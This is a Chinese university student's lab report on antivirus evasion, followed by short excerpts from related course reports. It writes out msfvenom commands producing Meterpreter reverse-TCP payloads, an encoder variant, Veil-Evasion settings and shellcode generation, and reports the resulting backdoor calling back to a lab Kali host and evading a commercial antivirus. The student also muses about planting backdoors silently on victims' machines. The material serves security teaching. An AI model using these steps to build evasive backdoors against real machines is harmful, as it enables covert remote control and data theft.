20145239杜文超《网络对抗》- 免杀原理与实践

《网络对抗》- 免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 根据搜集来的最全的、最新的特征码库,检测程序有没有异常或者可疑的行为。

(2)免杀是做什么?

  • 利用一些手段,让你的的后门不被AV软件发现。

(3)免杀的基本方法有哪些?

  • 加壳、用其他语言进行重写再编译。
  • 使用反弹式连接。
  • 自己手工编一个。

实践总结与体会

这次的免杀实验做得非常顺利,每一个步骤基本上都一次成功,虽然这正是我所希望的但也有不好就是万一下次遇到问题可能不会解决,毕竟遇到问题、解决问题的过程才能让学习的效果达到最大化。最令我得意的是我把win10自带的Windowsdefender关闭后,明目张胆地运行我的后门,然后打开腾讯管家进行杀毒,居然!没有发现威胁,可喜又可悲,我一个菜鸟级别的黑客做得经过免杀处理的后门居然都杀不掉,那遇到大神做得那该咋办呢?

离实战还缺些什么技术或步骤?

  • 如何把后门悄无声息的植入到被攻击者的电脑里,还有控制端需要一个稳定的ip地址来监听靶机。
  • 杀毒软件的病毒库更新太快,自己编写很有难度,所以还需要对代码有更深层次的理解。

实践过程记录

msfvenom直接生成meterpreter可执行文件

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 PORT=208 -f exe > test_20145239.exe

  • 果然,一大半的杀软都查出来了。

Msfvenom使用编码器生成可执行文件

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.119.128 LPORT=208 -f exe > 5239-encoded.exe

  • 效果也不理想,看来编码也没什么用

Veil-Evasion生成可执行文件

  • 因为我使用了老师的虚拟机,自带Veil-Evasion,所以直接开始实验
  • 在终端下输入指令veil-evasion即可打开软件,依次输入以下指令:

use python/meterpreter/rev_tcp //设置payload

set LHOST 192.168.119.128 //设置反弹连接IP

set LPORT 4444 //设置反弹端口4444

generate //生成

test2_5239//程序名

1

  • 生成的后门直接拿去检测

  • 还行还行,只有25%的杀软查出来了。

利用shellcode编写后门程序的检测

  • 先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 LPORT=443 -f c生成一个c语言格式的Shellcode数组
  • 然后利用VS2013打开老师给出的代码,修改修改(代码具体内容自行脑补,嘿嘿)

  • 完成后编译运行
  • win下的exe就相当于后门

  • 看一下kali,已经反弹连接成功了

  • 依旧输入一下dir指令试试,成功获得文件目录信息!

  • 再次使用virscan扫描一下,大获成功,只有10%的杀毒软件杀出了我的后门。

  • 好,现在来测试一下我电脑上的杀毒软件吧!先关闭windowsdefender打开腾讯电脑管家。
  • 扫描一下病毒:

  • 天哪!居然无风险项。再在kali使用后门截个图,一点影响都没有,照常使用。

  • 好吧,腾讯电脑管家太不靠谱了,天知道他漏过了多少后门,打开win下的windowsdefender扫描试试:

  • 上次实验我没做免杀的后门分分钟就被杀了,这次还是给力的杀出了我后门。
  • 看来windowsdefender没有网上说的那么一无是处还是很优秀的。
  • 最后附上我电脑上的杀软版本:

时间: 2025-01-04 18:43:34

20145239杜文超《网络对抗》- 免杀原理与实践的相关文章

20145239杜文超《网络对抗技术》- 恶意代码分析

20145239杜文超<网络对抗技术>- 恶意代码分析 实验后回答问题 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. (1)使用计划任务schtasks指令动态监控系统运行 (2)使用sysmon工具动态监控系统运行 2.如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息. (1)使用systracer工具进行快照分析注册表信息.文件行为等信息的变化 (2)把程序放在vir

20145239杜文超《网络对抗》- 信息搜集与漏洞扫描

20145239杜文超<网络对抗>- 信息搜集与漏洞扫描 基础问题回答 (1)哪些组织负责DNS,IP的管理? 美国政府授权ICANN统一管理全球根服务器,负责全球的域名根服务器.DNS和IP地址管理,全球根域名服务器绝大多数在欧洲和北美(全球13台,用A~M编号),中国仅拥有镜像服务器(备份). 全球一共有5个地区性注册机构:ARIN主要负责北美地区业务,RIPE主要负责欧洲地区业务,APNIC主要负责亚太地区业务,LACNIC主要负责拉丁美洲美洲业务,AfriNIC负责非洲地区业务. (2

2019-2020-2 20175215丁文韬《网络对抗技术》Exp3 免杀原理与实践

一.恶意代码检测机制和免杀原理 由于老师实验指导书中有提到了,这部分内容不加赘述,只是提及一下. 1.恶意代码检测机制 1.1 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 1.2 启发式恶意软件检测 "When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 杀软是如何检测出恶意代码的 基于

2019-2020-2 20175327《网络对抗技术》Exp3 免杀原理与实践

目录 一.学习目标 二.基础知识 1.1 恶意软件检测机制 1.1.1 基于特征码的检测 1.1.2 启发式恶意软件检测 1.1.3 基于行为的恶意软件检测 三.实验步骤 1.使用msf编码器msfvenom生成后门程序 (1)正确使用msf编码器 (2)msfvenom生成如jar之类的其他文件 (2)mfsvenom生成php文件 (3)veil (4)用shellcode编程生成后门程序 (5)加壳 加密壳(Hyperion) (6)使用其他课堂未介绍方法 2.通过组合应用各种技术实现恶意

2019-2020-2 20175316盛茂淞《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175316盛茂淞<网络对抗技术>Exp3 免杀原理与实践 一.实验目标 熟悉后门的概念 使用netcat实现win,linux之间的后门连接 掌握meterpreter的应用 了解MSF POST 模块的应用 学会win,linux的后门启动方式 二.基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征码的检测(需要定期更新病毒库) 启发式恶意软件检测(实时监控,开销较大) 基于行为的恶意软件检测(如API监控) 2.免杀是做什么? 通过伪装,加解密,对she

20145239 杜文超 实验四 Android开发基础

20145239实验四 Android开发基础 实验内容 基于Android Studio开发简单的Android应用并部署测试 了解Android组件.布局管理器的使用 掌握Android中事件处理机制 Android Studio安装 实验步骤 安装 JDK 并配置 JDK 环境变量 依次使用计算机->系统属性->高级系统设置->高级->环境变量,然后新建一个JAVA_HOME变量,令它为计算机中安装JDK的位置: 安装Andriod Studio并配置 1.双击运行Andri

20145309《网络对抗技术》免杀原理与实践

20145309<网络对抗技术>免杀原理与实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 根据特征来检测:对已存在的流行代码特征的提取与比对根据行为来检测:是否有更改注册表行为.是否有设置自启动.是否有修改权限等等 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀. (3)免杀的基本方法有哪些? 加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,所以加这些壳还不如不加:加花指令:就是加一段垃圾代码,但是并不影响程序的正

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛<网络对抗>--免杀原理与实践 问题回答 1.杀软是如何检测出恶意代码的? 一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测 2.免杀是做什么? 让病毒不被杀毒软件kill掉 3.免杀的基本方法有哪些? a)可以用这次实验所涉及的改变特征码 b)加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,效果其实不好 实践过程 一.使用msf生成后门程序的检测 1.用上节课所讲的msf生成一个后门 2.到相应网站上查